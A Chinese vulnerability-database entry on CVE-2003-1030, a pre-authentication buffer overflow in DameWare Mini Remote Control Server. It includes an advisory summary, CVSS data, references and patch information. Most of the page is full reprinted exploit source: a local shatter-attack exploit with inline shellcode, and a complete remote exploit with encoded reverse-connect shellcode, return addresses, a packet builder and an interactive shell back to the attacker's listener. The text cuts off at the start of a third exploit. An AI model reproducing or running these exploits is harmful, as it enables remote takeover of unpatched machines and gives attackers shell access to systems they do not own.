CVE-2003-1030
CVSS7.5
发布时间 :2004-02-17 00:00:00
修订时间 :2016-10-17 22:39:10
NMCOES    

[原文]Buffer overflow in DameWare Mini Remote Control before 3.73 allows remote attackers to execute arbitrary code via a long pre-authentication request to TCP port 6129.


[CNNVD]DameWare Mini远程控制服务器预验证缓冲区溢出漏洞(CNNVD-200402-080)

        
        DameWare Mini是一款基于Windows的远程控制服务程序。
        DameWare Mini在预验证包处理上存在一个缓冲区溢出,远程攻击者可以利用这个漏洞可能以服务进程权限在系统上执行任意指令。
        默认情况下DameWare Mini监听TCP 6129端口,通过构建伪造的通信包作为客户端,可触发缓冲区溢出。当于DWRCS进行通信时,客户端会发送所有预验证信息如本地用户名、远程用户名、本地NetBIOS名、公司名、注册名、注册键值、日期和时间、小写NetBIOS名、客户端IP地址、远程客户端版本,在这些初始化包发送后,客户端再发送请求验证类型(如NTLMSSP),如果用户名不正确,服务器会进行错误应答并把这些变量会通过strcpy函数进行处理,由于没有进行正确的边界缓冲区检查,提交超多的预验证信息可触发缓冲区溢出,精心构建提交数据可能以服务进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:dameware_development:mini_remote_control_server:3.70_.0.0
cpe:/a:dameware_development:mini_remote_control_server:3.72_.0.0
cpe:/a:dameware_development:mini_remote_control_server:3.71_.0.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1030
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1030
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200402-080
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=107152094119279&w=2
(UNKNOWN)  BUGTRAQ  20031214 DameWare Mini Remote Control Server <= 3.72 Buffer Overflow
http://marc.info/?l=bugtraq&m=107187110617266&w=2
(UNKNOWN)  BUGTRAQ  20031219 [Exploit]: DameWare Mini Remote Control Server Overflow Exploit
http://marc.info/?l=bugtraq&m=107392603615840&w=2
(UNKNOWN)  BUGTRAQ  20040110 DameWare Mini Remote Control < v3.73 remote exploit by kralor]
http://sh0dan.org/files/dwmrcs372.txt
(UNKNOWN)  MISC  http://sh0dan.org/files/dwmrcs372.txt
http://www.kb.cert.org/vuls/id/909678
(VENDOR_ADVISORY)  CERT-VN  VU#909678
http://www.securityfocus.com/bid/9213
(VENDOR_ADVISORY)  BID  9213
http://xforce.iss.net/xforce/xfdb/14001
(VENDOR_ADVISORY)  XF  dameware-spoof-packet-bo(14001)

- 漏洞信息

DameWare Mini远程控制服务器预验证缓冲区溢出漏洞
高危 边界条件错误
2004-02-17 00:00:00 2005-10-20 00:00:00
远程  
        
        DameWare Mini是一款基于Windows的远程控制服务程序。
        DameWare Mini在预验证包处理上存在一个缓冲区溢出,远程攻击者可以利用这个漏洞可能以服务进程权限在系统上执行任意指令。
        默认情况下DameWare Mini监听TCP 6129端口,通过构建伪造的通信包作为客户端,可触发缓冲区溢出。当于DWRCS进行通信时,客户端会发送所有预验证信息如本地用户名、远程用户名、本地NetBIOS名、公司名、注册名、注册键值、日期和时间、小写NetBIOS名、客户端IP地址、远程客户端版本,在这些初始化包发送后,客户端再发送请求验证类型(如NTLMSSP),如果用户名不正确,服务器会进行错误应答并把这些变量会通过strcpy函数进行处理,由于没有进行正确的边界缓冲区检查,提交超多的预验证信息可触发缓冲区溢出,精心构建提交数据可能以服务进程权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        DameWare Development
        --------------------
        DameWare Mini Remote Control Server 3.73.0.0版本不受此漏洞影响,请到厂商的主页下载:
        
        http://www.dameware.com

- 漏洞信息 (79)

DameWare Mini Remote Control Server SYSTEM Exploit (EDBID:79)
windows local
2003-08-13 Verified
0 ash
N/A [点击下载]
/*

DameWare Mini Remote Control Server Local SYSTEM Exploit
Vulnerable Versions Prior to 3.71.0.0 by ash@felinemenace.org 
	
This code is based on shards.cpp by xenophile

*/

#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>
#pragma warning(disable: 4305)
#pragma warning(disable: 4309)
void MakeShellCode (char *buffer)
{
HMODULE hCRT;
void * lpSystem;
int count=0;

while (count < 36)
{
buffer [count] =0x90;
count ++;
}

buffer[37]=0x8B; buffer[38]=0xE5; buffer[39]=0x55;
buffer[40]=0x8B; buffer[41]=0xEC; buffer[42]=0x33;
buffer[43]=0xFF; buffer[44]=0x90; buffer[45]=0x57;
buffer[46]=0x83; buffer[47]=0xEC; buffer[48]=0x04;
buffer[49]=0xC6; buffer[50]=0x45; buffer[51]=0xF8;
buffer[52]=0x63; buffer[53]=0xC6; buffer [54]=0x45;
buffer[55]=0xF9; buffer[56]=0x6D; buffer [57]=0xC6;
buffer[58]=0x45; buffer[59]=0xFA; buffer[60]=0x64;
buffer[61]=0xC6; buffer[62]=0x45; buffer[63]=0xFB;
buffer[64]=0x2E; buffer[65]=0xC6; buffer[66]=0x45;
buffer[67]=0xFC; buffer[68]=0x65; buffer[69]=0xC6;
buffer[70]=0x45; buffer[71]=0xFD; buffer [72]=0x78;
buffer[73]=0xC6; buffer[74]=0x45; buffer [75] =0xFE;
buffer[76]=0x65;

hCRT = LoadLibrary("msvcrt.dll");
lpSystem = GetProcAddress( hCRT, "system" );
buffer[77]=0xB8;
buffer[78]=((char *)&lpSystem) [0];
buffer[79]=((char *)&lpSystem) [1];
buffer[80]=((char *)&lpSystem) [2];
buffer[81]=((char *)&lpSystem) [3];
buffer [82] =0x50; buffer[83]=0x8D; buffer[84]=0x45;
buffer[85]=0xF8; buffer[86]=0x50; buffer[87]=0xFF;
buffer [88]=0x55; buffer[89]=0xF4;
count = 90;
while (count < 291)
{
buffer [count] =0x90;
count ++;
}
buffer[291]=0x24; buffer[292]=0xF1; buffer [293]=0x5D;
buffer[294]=0x01; buffer[295]=0x26; buffer[296]=0xF1;
buffer [297] =0x5D; buffer[298]=0x01; buffer[299]=0x00;
buffer[300]=0x00;
return;
}
void ErrorNotify(DWORD err, char *title)
{
LPVOID lpMsgBuf;
FormatMessage(
FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
NULL,
err,
MAKELANGID (LANG_NEUTRAL, SUBLANG_DEFAULT), // Default language
(LPTSTR) &lpMsgBuf,
0,
NULL
) ;

printf("%s\n",lpMsgBuf);

LocalFree( lpMsgBuf );
};
#define SHELLCODE_SIZE (1024 * 256)
#define SHELLCODE_OFFSET (SHELLCODE_SIZE -400)
int main(int argc, char* argv[])
{
HWND hWnd;
HWND hWndChild;
char sc[SHELLCODE_SIZE];
char szWindowName[] = "About DameWare Mini Remote Control Server";
LONG lExecAddress;
sc[0] = 'x'; sc[1] = 'e'; sc[2] = 'n'; sc[3] = '0';
memset( &sc[4], 0x90, SHELLCODE_SIZE -4);
MakeShellCode( &sc[SHELLCODE_OFFSET] );
printf( "\nfm-shatterdame.c\nash@felinemenace.org\n" );
printf("--------------------------------------------------------------\n");
printf("Exploits shatter attack in DameWare Mini Remote Control 
Server\n");
printf("This is based on shards.cpp written by xenophile.\n") ;
printf("--------------------------------------------------------------\n");
printf(
"STEP 1: Finding our window!\n"
) ;



hWnd = FindWindow( NULL, szWindowName );
if( hWnd == NULL)
{

	printf("Couldn't find the dameware about dialogue. Open it and re-run 
this\n");
return 0;
}

hWndChild = FindWindowEx(hWnd, NULL, "Edit", NULL);

if( hWndChild == NULL)
{

printf("\tCouldn't find child edit control window\n");

return 0;
}

SendMessage( hWndChild, EM_SETREADONLY, 0, 0 );

SendMessage( hWndChild, EM_SETLIMITTEXT, SHELLCODE_SIZE, 0L );

if ( ! SendMessage( hWndChild, WM_SETTEXT, 0, (LPARAM)sc ) ) {
ErrorNotify ( GetLastError (), "error");
}
printf(
"\n\nSTEP 2: Enter shell code address. "
"This can be found using a debugger."
) ;
printf( "\nOn my XP SP1 machine 0x160000 worked.\n" );

printf( "\n\nEnter execution address: " );
scanf( "%x", &lExecAddress );

if ( ! SendMessage( hWndChild, EM_SETWORDBREAKPROC, 0L, 
(LPARAM)lExecAddress ) ) {
ErrorNotify( GetLastError(), "error" );
}

SendMessage( hWndChild, WM_LBUTTONDBLCLK, MK_LBUTTON, 
(LPARAM)0x000a000a );

return 0;
}

// milw0rm.com [2003-08-13]
		

- 漏洞信息 (23435)

DameWare Mini Remote Control Server 3.7x Pre-Authentication Buffer Overflow Vulnerability (1) (EDBID:23435)
windows remote
2003-12-16 Verified
0 Adik
N/A [点击下载]
source: http://www.securityfocus.com/bid/9213/info

A problem has been identified in the handling of pre-authentication packets by DameWare Mini Remote Control Server. Because of this, it may be possible for a remote attacker to gain unauthorized access to hosts using the vulnerable software. 


/*******************************************************************************
 *	
 *		DameWare Remote Control Server Stack Overflow Exploit 
 *		
 *		Discovered by:			wirepair
 *		Exploit by:				Adik [ netmaniac (at) hotmail.KG ]		
 *
 *		Vulnerable Versions:	<= 3.72.0.0
 *		Tested on:				3.72.0.0 Win2k SP3 & WinXp SP3
 *		Payload:				Reverse Connect Shellcode, exits gracefully 
 *								doesn't terminate remote process.
 *		
 * [16/Dec/2003] Bishkek
 *******************************************************************************/


#include <stdio.h>
#include <string.h>
#include <winsock.h>
//#include "netmaniac.h"
#pragma comment(lib,"ws2_32") 
#define ACCEPT_TIMEOUT	10
#define RECVTIMEOUT		15

#define ID_UNKNOWN		0
#define ID_WIN2K		1
#define ID_WINXP		2
#define ID_WIN2K3		3
#define ID_WINNT		4
#define VER				"0.5"	
//#include "dmware.rc"

/*******************************************************************************/		
	unsigned char send_buff[40] = {
	0x30, 0x11, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xC3, 0xF5, 0x28, 0x5C, 0x8F, 0xC2, 0x0D, 0x40, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00
	};

	unsigned char kyrgyz_rshell[] = { //418
	0xEB, 0x03, 0x5D, 0xEB, 0x05, 0xE8, 0xF8, 0xFF, 0xFF, 0xFF, 0x8B, 0xC5, 0x83, 0xC0, 0x11, 0x33, 
	0xC9, 0x66, 0xB9, 0xa2, 0x01, 0x80, 0x30, 0x88, 0x40, 0xE2, 0xFA,
	0xDD, 0x03, 0x64, 0x03, 0x7C, 0xEE, 0x09, 0x64, 0x08, 0x88, 0x60, 0xAE, 0x89, 0x88, 0x88, 0x01, 
	0xCE, 0x74, 0x77, 0xFE, 0x74, 0xE0, 0x06, 0xC6, 0x86, 0x64, 0x60, 0xA3, 0x89, 0x88, 0x88, 0x01, 
	0xCE, 0x64, 0xE0, 0xBB, 0xBA, 0x88, 0x88, 0xE0, 0xFF, 0xFB, 0xBA, 0xD7, 0xDC, 0x77, 0xDE, 0x64, 
	0x01, 0xCE, 0x70, 0x77, 0xFE, 0x74, 0xE0, 0x25, 0x51, 0x8D, 0x46, 0x60, 0x82, 0x89, 0x88, 0x88, 
	0x01, 0xCE, 0x56, 0x77, 0xFE, 0x74, 0xE0, 0xFA, 0x76, 0x3B, 0x9E, 0x60, 0x72, 0x88, 0x88, 0x88, 
	0x01, 0xCE, 0x52, 0x77, 0xFE, 0x74, 0xE0, 0x67, 0x46, 0x68, 0xE8, 0x60, 0x62, 0x88, 0x88, 0x88, 
	0x01, 0xCE, 0x5E, 0x77, 0xFE, 0x70, 0xE0, 0x43, 0x65, 0x74, 0xB3, 0x60, 0x52, 0x88, 0x88, 0x88, 
	0x01, 0xCE, 0x7C, 0x77, 0xFE, 0x70, 0xE0, 0x51, 0x81, 0x7D, 0x25, 0x60, 0x42, 0x88, 0x88, 0x88, 
	0x01, 0xCE, 0x78, 0x77, 0xFE, 0x70, 0xE0, 0x64, 0x71, 0x22, 0xE8, 0x60, 0x32, 0x88, 0x88, 0x88, 
	0x01, 0xCE, 0x60, 0x77, 0xFE, 0x70, 0xE0, 0x6F, 0xF1, 0x4E, 0xF1, 0x60, 0x22, 0x88, 0x88, 0x88, 
	0x01, 0xCE, 0x6A, 0xBB, 0x77, 0x09, 0x64, 0x7C, 0x89, 0x88, 0x88, 0xDC, 0xE0, 0x89, 0x89, 0x88, 
	0x88, 0x77, 0xDE, 0x7C, 0xD8, 0xD8, 0xD8, 0xD8, 0xC8, 0xD8, 0xC8, 0xD8, 0x77, 0xDE, 0x78, 0x03, 
	0x50, 0xE0, 0x48, 0x20, 0xB7, 0x89, 0xE0, 0x8A, 0x88, 0xAA, 0x99, 0x03, 0x44, 0xE2, 0x98, 0xD9, 
	0xDB, 0x77, 0xDE, 0x60, 0x0D, 0x48, 0xFD, 0xD2, 0xE0, 0xEB, 0xE5, 0xEC, 0x88, 0x01, 0xEE, 0x5A, 
	0x0B, 0x4C, 0x24, 0x05, 0xB4, 0xAC, 0xBB, 0x48, 0xBB, 0x41, 0x08, 0x49, 0x9D, 0x23, 0x6A, 0x75, 
	0x4E, 0xCC, 0xAC, 0x98, 0xCC, 0x76, 0xCC, 0xAC, 0xB5, 0x76, 0xCC, 0xAC, 0xB6, 0x01, 0xD4, 0xAC, 
	0xC0, 0x01, 0xD4, 0xAC, 0xC4, 0x01, 0xD4, 0xAC, 0xD8, 0x05, 0xCC, 0xAC, 0x98, 0xDC, 0xD8, 0xD9, 
	0xD9, 0xD9, 0x4E, 0xCC, 0xAC, 0x8B, 0x80, 0xC9, 0xD9, 0xC1, 0xD9, 0xD9, 0x77, 0xFE, 0x5A, 0xD9, 
	0x77, 0xDE, 0x52, 0x03, 0x44, 0xE2, 0x77, 0x77, 0xB9, 0x77, 0xDE, 0x56, 0x03, 0x40, 0xDB, 0x77, 
	0xDE, 0x6A, 0x77, 0xDE, 0x5E, 0xDE, 0xEC, 0x29, 0xB8, 0x88, 0x88, 0x88, 0x03, 0xC8, 0x84, 0x03, 
	0xF8, 0x94, 0x25, 0x03, 0xC8, 0x80, 0xD6, 0x4A, 0x8C, 0x88, 0xDB, 0xDD, 0xDE, 0xDF, 0x03, 0xE4, 
	0xAC, 0x90, 0x03, 0xCD, 0xB4, 0x03, 0xDC, 0x8D, 0xF0, 0x8B, 0x5D, 0x03, 0xC2, 0x90, 0x03, 0xD2, 
	0xA8, 0x8B, 0x55, 0x6B, 0xBA, 0xC1, 0x03, 0xBC, 0x03, 0x8B, 0x7D, 0xBB, 0x77, 0x74, 0xBB, 0x48, 
	0x24, 0xB2, 0x4C, 0xFC, 0x8F, 0x49, 0x47, 0x85, 0x8B, 0x70, 0x63, 0x7A, 0xB3, 0xF4, 0xAC, 0x9C, 
	0xFD, 0x69, 0x03, 0xD2, 0xAC, 0x8B, 0x55, 0xEE, 0x03, 0x84, 0xC3, 0x03, 0xD2, 0x94, 0x8B, 0x55, 
	0x03, 0x8C, 0x03, 0x8B, 0x4D, 0x63, 0x8A, 0xBB, 0x48, 0x03, 0x5D, 0xD7, 0xD6, 0xD5, 0xD3, 0x4A, 
	0x8C, 0x88
	};

/*******************************************************************************/
long gimmeip(char *hostname);
void cmdshell (int sock);
int check_os(char *host,unsigned short target_port, unsigned int *sp);

struct timeval tv;
fd_set fds;		
char recv_buff1[5000]="";
/***********************-( os jmp esp offsets )-********************************/
struct sp_levels
{
	unsigned long eip;
	char library[20];
} ;
/*************-[ offsets grabbed from www.metasploit.com ]-*********************/
struct
{
	//int sp;
	//unsigned long eip;
	char os_type[10];
	struct sp_levels sp[7];

} target_os[]=
{
	{
		"UNKNOWN",{{0,""},{0,""},{0,""},{0,""},{0,""},{0,""},{0,""}}		
	},
	{
			"WIN 2000",
			{{ 0x750362c3,"ws2_32.dll" },{ 0x75035173,"ws2_32.dll" },{ 0x7503431b,"ws2_32.dll" },
			{  0x77db912b,"advapi32.dll" },{ 0x7c372063,"advapi32.dll" },{ 0,"" },{ 0,"" }	} 
	},
	{
			"WIN XP",
			{ 	{ 0x71ab7bfb,"ws2_32.dll" },{ 0x71ab7bfb,"ws2_32.dll" },{ 0,"" },
				{ 0,"" },{ 0,"" },{ 0,"" },{ 0,"" }	} //2 sp on winxp
	},
	{
			"WIN 2003",
			{{0x77db565c,"advapi32.dll"},{0,""},{0,""},{0,""},{0,""},{0,""},{0,""}}//SP 0??	
	},
	{
			"WIN NT4",
			{ // only SP3 + SP 6 r filled in
			{ 0x77777777,"unknown.dll" },{ 0x77777776,"unknown.dll" },{ 0x77777775,"unknown.dll" },
			{ 0x77f326c6,"kernel32.dll" },{ 0x77777773,"unknown.dll" },{ 0x77777772,"unknown.dll" },
			{ 0x77f32836,"kernel32.dll" }			
			}//6 SP		
	}

};
/****************************************************************************/


int main(int argc,char *argv[])
{     
		WSADATA wsaData;						
		struct sockaddr_in targetTCP, localTCP, inAccTCP;
		int sockTCP,s,localSockTCP,accSockTCP, acsz,switchon;
		unsigned char send_packet[4135]="";
		unsigned short local_port, target_port;
		unsigned long local_ip, target_ip;
		unsigned int os_sp=0;
		int os_ver=0;
		printf("\n\t...oO DameWare Remote Control Server Overflow Exploit Oo...\n\n"
				   "\t\t-( by Adik netmaniac[at]hotmail.KG )-\n\n");
		printf(" - Versions vulnerable: <= DWRCS 3.72.0.0\n");
		printf(" - Tested on: DWRCS ver: 3.72.0.0 Win2k SP3 & WinXP SP1\n\n");
		if(argc < 4)
		{
			
			printf(" Usage: %s <TargetIP> <TargetPort> <YourIp> <YourPort>\n"
					" eg: %s 10.0.0.1 6129 10.0.0.2 21\n\n",argv[0],argv[0]);
			return 1;			
		}				
		
		WSAStartup(0x0202, &wsaData);				
		target_port = atoi(argv[2]);		        		

		local_port = htons((unsigned short)atoi(argv[4]));
		local_ip = inet_addr(argv[3]);
		local_port ^= 0x8888;
		local_ip ^= 0x88888888;

		*(unsigned long *)&kyrgyz_rshell[194+27] = local_ip;
		*(unsigned short *)&kyrgyz_rshell[201+27] = local_port;		

		printf( "[*] Target IP:\t%s \tPort: %s\n"
				"[*] Local IP:\t%s \tListening Port: %s\n\n",argv[1],argv[2],argv[3],argv[4]);

		target_ip=gimmeip(argv[1]);	
        memset(&targetTCP, 0, sizeof(targetTCP));
		memset(&localTCP, 0, sizeof(localTCP));
		
        targetTCP.sin_family = AF_INET;
        targetTCP.sin_addr.s_addr = target_ip;
        targetTCP.sin_port = htons(target_port);				
						
		localTCP.sin_family = AF_INET;
        localTCP.sin_addr.s_addr = INADDR_ANY;
        localTCP.sin_port = htons((unsigned short)atoi(argv[4]));

		printf("[*] Initializing sockets...");

        if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
		{
				printf("\t\t\t[ FAILED ]\n Socket1 not initialized! Exiting...\n");
				WSACleanup();
                return 1;
		}
		if ((localSockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
		{
				printf("\t\t\t[ FAILED ]\n Socket2 not initialized! Exiting...\n");
				WSACleanup();
                return 1;
		}
		printf("\t\t\t[ OK ]\n");

		printf("[*] Binding to local port: %s...",argv[4]);

		if(bind(localSockTCP,(struct sockaddr *)&localTCP,sizeof(localTCP)) !=0)
		{
				printf("\t\t[ FAILED ]\n Failed binding to port: %s! Exiting...\n",argv[4]);
				WSACleanup();
                return 1;
		}

		printf("\t\t[ OK ]\n");
		printf("[*] Setting up a listener...");
		if(listen(localSockTCP,1) != 0)
		{
				printf("\t\t\t[ FAILED ]\nFailed to listen on port: %s! Exiting...\n",argv[4]);
				WSACleanup();
                return 1;
		}
		printf("\t\t\t[ OK ]\n");
		os_ver = check_os(argv[1],(unsigned short)atoi(argv[2]),&os_sp);
		
		printf(" EIP: 0x%x (%s)\n\n",target_os[os_ver].sp[os_sp].eip,target_os[os_ver].sp[os_sp].library);
		printf("[*] Constructing packet for %s SP: %d...",target_os[os_ver].os_type,os_sp);				
		memcpy(send_packet,"\x10\x27",2);				
		//memcpy(send_packet+500,"neTmaNiac",strlen("netmaniac"));
		memset(send_packet+0xc4+9,0x90,700);		
		
		*(unsigned long*)&send_packet[516] = target_os[os_ver].sp[os_sp].eip;

		memcpy(send_packet+520,kyrgyz_rshell,strlen(kyrgyz_rshell));		
		memcpy(send_packet+0x3d0,"neTmaNiac",9);				
		memcpy(send_packet+0x5b4+0x24,"netmaniac was here",18);				
		memcpy(send_packet+0x5b4+0x128,"12/12/04 13:13:13",17);				
		memcpy(send_packet+0x5b4+0x538,"netninjaz_place",15);				
		memcpy(send_packet+0x5b4+0x5b4+0x88,"131.131.131.131",16);				
		memcpy(send_packet+0x5b4+0x5b4+0x394,"3.72.0.0",strlen("3.72.0.0"));
				
		printf("\t[ OK ]\n");
		
		printf("[*] Connecting to %s:%s...",argv[1],argv[2]);		

		if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
		{
			printf("\n[x] Connection to host failed! Exiting...\n");
			WSACleanup();
			exit(1);
		} 		
		printf("\t\t[ OK ]\n");

		switchon=1;
		ioctlsocket(sockTCP,FIONBIO,&switchon);	
		tv.tv_sec = RECVTIMEOUT;
		tv.tv_usec = 0;
		FD_ZERO(&fds);
		FD_SET(sockTCP,&fds);	

		if((select(1,&fds,0,0,&tv))>0)
		{
			recv(sockTCP, recv_buff1, sizeof(recv_buff1),0);			
		}
		else
		{
			printf("[x] Timeout! Failed to recv packet.\n");
			exit(1);
		}		
		
		//DumpMemory(recv_buff1,50);
		memset(recv_buff1,0,sizeof(recv_buff1));
		
		switchon=0;
		ioctlsocket(sockTCP,FIONBIO,&switchon);	

		if (send(sockTCP, send_buff, sizeof(send_buff),0) == -1)
		{
				printf("[x] Failed to inject packet! Exiting...\n");
				WSACleanup();
                return 1;
		}
		
		switchon=1;
		ioctlsocket(sockTCP,FIONBIO,&switchon);	
		tv.tv_sec = RECVTIMEOUT;
		tv.tv_usec = 0;
		FD_ZERO(&fds);
		FD_SET(sockTCP,&fds);	

		if((select(sockTCP+1,&fds,0,0,&tv))>0)
		{
			recv(sockTCP, recv_buff1, sizeof(recv_buff1),0);			
			switchon=0;
			ioctlsocket(sockTCP,FIONBIO,&switchon);				
			if (send(sockTCP, send_packet, sizeof(send_packet),0) == -1)
			{
				printf("[x] Failed to inject packet2! Exiting...\n");
				WSACleanup();
                return 1;
			}
		}
		else
		{
				printf("\n[x] Timeout! Failed to receive packet! Exiting...\n");
				WSACleanup();
                return 1;
		}		
			
		printf("[*] Packet injected!\n");
		closesocket(sockTCP);				
		printf("[*] Waiting for incoming connection...\r");

		switchon=1;
		ioctlsocket(localSockTCP,FIONBIO,&switchon);	
		tv.tv_sec = ACCEPT_TIMEOUT;
		tv.tv_usec = 0;
		FD_ZERO(&fds);
		FD_SET(localSockTCP,&fds);	

		if((select(1,&fds,0,0,&tv))>0)
		{
			acsz = sizeof(inAccTCP);
			accSockTCP = accept(localSockTCP,(struct sockaddr *)&inAccTCP, &acsz);
			printf("[*] Connection request accepted: %s:%d\n", inet_ntoa(inAccTCP.sin_addr), (int)ntohs(inAccTCP.sin_port));
			printf("[*] Dropping to shell...\n\n");
			cmdshell(accSockTCP);
		}
		else
		{
				printf("\n[x] Exploit appears to have failed!\n");
				WSACleanup();
		}
		
        return 0;
}
/*********************************************************************************/
int check_os(char *host,unsigned short target_port, unsigned int *sp)
{
	int sockTCP,switchon;
	struct sockaddr_in targetTCP;
	struct timeval tv;
	fd_set fds;
	
	memset(&targetTCP,0,sizeof(targetTCP));	
	targetTCP.sin_family = AF_INET;
    targetTCP.sin_addr.s_addr = inet_addr(host);
    targetTCP.sin_port = htons(target_port);

	    if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
		{
				printf("\t\t\t[ FAILED ]\n Socket1 not initialized! Exiting...\n");
				WSACleanup();
                return 1;
		}		

		if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
		{
			printf("[x] Connection to host failed! Exiting...\n");
			WSACleanup();
			exit(1);
		} 	

		switchon=1;
		ioctlsocket(sockTCP,FIONBIO,&switchon);	
		tv.tv_sec = RECVTIMEOUT;
		tv.tv_usec = 0;
		FD_ZERO(&fds);
		FD_SET(sockTCP,&fds);	

		if((select(1,&fds,0,0,&tv))>0)
		{
			recv(sockTCP, recv_buff1, sizeof(recv_buff1),0);			
		}
		else
		{
			printf("[x] Timeout! Doesn't appear to b a DMWRCS\n");
			exit(1);
		}

		switchon=0;
		ioctlsocket(sockTCP,FIONBIO,&switchon);	

		if (send(sockTCP, send_buff, sizeof(send_buff),0) == -1)
		{
				printf("[x] Failed to inject packet! Exiting...\n");
				WSACleanup();
                return 1;
		}
		
		switchon=1;
		ioctlsocket(sockTCP,FIONBIO,&switchon);	
		tv.tv_sec = RECVTIMEOUT;
		tv.tv_usec = 0;
		FD_ZERO(&fds);
		FD_SET(sockTCP,&fds);	

		if((select(sockTCP+1,&fds,0,0,&tv))>0)
		{
			recv(sockTCP, recv_buff1, sizeof(recv_buff1),0);			
			closesocket(sockTCP);	
		}
		else
		{
				printf("\n[x] Timeout! Failed to receive packet! Exiting...\n");
				WSACleanup();
                return 1;
		}				
		
		printf("\n OS Info   : ");
		if(recv_buff1[8]==5 && recv_buff1[12]==0)
		{		
			printf("WIN2000 [ver 5.0.%d]\n SP String : %-1.20s\n\n",*(unsigned short *)&recv_buff1[16],&recv_buff1[24]);
			*sp = atoi(&recv_buff1[37]);
			closesocket(sockTCP);	
			return ID_WIN2K;
		}
		else if(recv_buff1[8]==5 && recv_buff1[12]==1)
		{		
			printf("WINXP [ver 5.1.%d]\n SP String : %-1.20s\n\n",*(unsigned short *)&recv_buff1[16],&recv_buff1[24]);
			*sp = atoi(&recv_buff1[37]);
			closesocket(sockTCP);	
			return ID_WINXP;
		}
		else if(recv_buff1[8]==5 && recv_buff1[12]==2)
		{			
			printf("WIN2003 [ver 5.2.%d]\n SP String : %-1.20s\n\n",*(unsigned short *)&recv_buff1[16],&recv_buff1[24]);
			*sp = atoi(&recv_buff1[37]);
			closesocket(sockTCP);	
			return ID_WIN2K3;
		}
		else if(recv_buff1[8]==4)
		{		
			printf("WINNT4\n SP String : %-1.20s\n\n",&recv_buff1[24]);
			*sp = atoi(&recv_buff1[37]);
			closesocket(sockTCP);	
			return ID_WINNT;
		} 
		else
		{
			printf("UNKNOWN\n");
			closesocket(sockTCP);	
			return ID_UNKNOWN;
		}		
		
}
/*********************************************************************************/
long gimmeip(char *hostname) 
{
	struct hostent *he;
	long ipaddr;
	
	if ((ipaddr = inet_addr(hostname)) < 0) 
	{
		if ((he = gethostbyname(hostname)) == NULL) 
		{
			printf("[x] Failed to resolve host: %s! Exiting...\n\n",hostname);
			WSACleanup();
			exit(1);
		}
		memcpy(&ipaddr, he->h_addr, he->h_length);
	}	
	return ipaddr;
}
/*********************************************************************************/
void cmdshell (int sock)
{
 struct timeval tv;
 int length;
 unsigned long o[2];
 char buffer[1000];
 
 tv.tv_sec = 1;
 tv.tv_usec = 0;

 while (1) 
 {
	o[0] = 1;
	o[1] = sock;	

	length = select (0, (fd_set *)&o, NULL, NULL, &tv);
	if(length == 1)
	{
		length = recv (sock, buffer, sizeof (buffer), 0);
		if (length <= 0) 
		{
			printf ("[x] Connection closed.\n");
			WSACleanup();
			return;
		}
		length = write (1, buffer, length);
		if (length <= 0) 
		{
			printf ("[x] Connection closed.\n");
			WSACleanup();
			return;
		}
	}
	else
	{
		length = read (0, buffer, sizeof (buffer));
		if (length <= 0) 
		{
			printf("[x] Connection closed.\n");
			WSACleanup();
			return;
		}
		length = send(sock, buffer, length, 0);
		if (length <= 0) 
		{
			printf("[x] Connection closed.\n");
			WSACleanup();
			return;
		}
	}
}

}
/*********************************************************************************/		

- 漏洞信息 (23436)

DameWare Mini Remote Control Server 3.7x Pre-Authentication Buffer Overflow Vulnerability (2) (EDBID:23436)
windows remote
2003-12-16 Verified
0 kralor
N/A [点击下载]
source: http://www.securityfocus.com/bid/9213/info
 
A problem has been identified in the handling of pre-authentication packets by DameWare Mini Remote Control Server. Because of this, it may be possible for a remote attacker to gain unauthorized access to hosts using the vulnerable software.

/**************************************************************************************/
/*     [Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt]    */
/* -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -  */
/* 8/10 win2k successfully exploited in blind mode (lang & type [pro,srv,etc] unknown) */
/* tested against dameware versions: v3.68  v3.72                                     */
/* In comments there's some information about offsets for jmp esp on diff OS.         */
/* I've fixed a problem in the shellc0de, when I check for kernel32.dll, on winXP it  */
/* is kernel32.dll, but on win2k it is KERNEL32.DLL (both in unicode format)          */
/* shellc0de is a bit long for this b0f, so ExitThread won't be called, but it is in  */
/* the shellcode.Some people reported me 2 different offsets for winXP pro, home, sp0 */
/* or sp1, so I don't know why it's different and I haven't XP at home I can't find   */
/* another better EIP for XP (hope this 2 offsets will be enough).                    */
/* greetz: MrNice,AnAc,TripaX & Decryptus for helping me to find the EIP values.      */
/*....................................................................................*/
/* informations: kralor[at]coromputer.net,www.coromputer.net,irc undernet #coromputer */
/**************************************************************************************/

#include <winsock.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

#pragma comment (lib,"ws2_32")

/*
0x717564B8   jmp esp in comctl32.dll
win2k fr adv srv sp2
win2k en adv srv sp3
win2k en adv srv sp4
win2k en srv     sp3
win2k fr pro     sp3
win2k en pro     sp4

// jmp esp @ 0x77E7898B | win2k fr adv srv sp 1
